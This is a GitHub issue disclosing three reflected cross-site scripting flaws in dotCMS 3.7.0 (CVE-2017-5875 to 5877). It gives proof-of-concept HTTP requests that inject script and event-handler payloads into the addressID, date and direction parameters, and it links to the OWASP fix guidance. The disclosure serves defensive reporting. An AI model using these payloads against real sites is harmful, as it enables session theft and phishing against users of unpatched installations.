Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Multiple XSS in dotCMS - 3.7.0 #10643

Open
Belladona-c0re opened this issue Feb 6, 2017 · 0 comments

Comments

Projects
None yet
1 participant
@Belladona-c0re
Copy link

commented Feb 6, 2017

The server reads data directly from the HTTP request and reflects it
back in the HTTP response. Reflected XSS exploits occur when an
attacker causes a victim to supply dangerous content to a vulnerable
web application, which is then reflected back to the victim and
executed by the web browser. The most common mechanism for delivering
malicious content is to include it as a parameter in a URL that is
posted publicly or e-mailed directly to the victim. URLs constructed
in this manner constitute the core of many phishing schemes, whereby
an attacker convinces a victim to visit a URL that refers to a
vulnerable site. After the site reflects the attacker's content back
to the victim, the content is executed by the victim's browser.

XSS CVE-2017-5875 (Authentication Necessary):

POST /dotCMS/myAccount HTTP/1.1
Host: demo.dotcms.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://demo.dotcms.com/dotCMS/myAccount
Cookie: JSESSIONID=D95CD5DB89C287CEA2234432695E867A; opvc=848b4f88-adbd-40d6-a69b-d4160a8410fa; sitevisitscookie=1; dmid=1969f627-d1c7-4955-8c96-945a612bb883; _ga=GA1.2.2066223524.1486029583; _ga=GA1.3.2066223524.1486029583; SHARED_SESSION_ID=UYBDKCZQ6YF0; DWRSESSIONID=GEXwqywzgm8NFrjv8YRJNCHj*Dl; _gat=1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 202

dispatch=editUserAddress&userId=%24%7BmyAccountForm.userId%7D&addressID=0q6rt0"><script>alert(1)<%2fscript>bewiz&prefix=other&firstName=Admin&lastName=User&suffix=&title=&emailAddress=admin%40dotcms.com&password=&newPassword=
captura3

XSS CVE-2017-5876:
GET /news-events/events/?date=2017-02-02yqqta"onmouseover%3d"alert(1)"style%3d"position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b"y5w4q&cat=3b8c53ec-f6ba-4b81-adef-6b7ed38a8490 HTTP/1.1
captura2

XSS CVE-2017-5877 :

GET /about-us/locations/index?direction=testlr68w"onfocus%3d"alert(1)"autofocus%3d"d0mt3&milesR=500

captura

How to fix: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.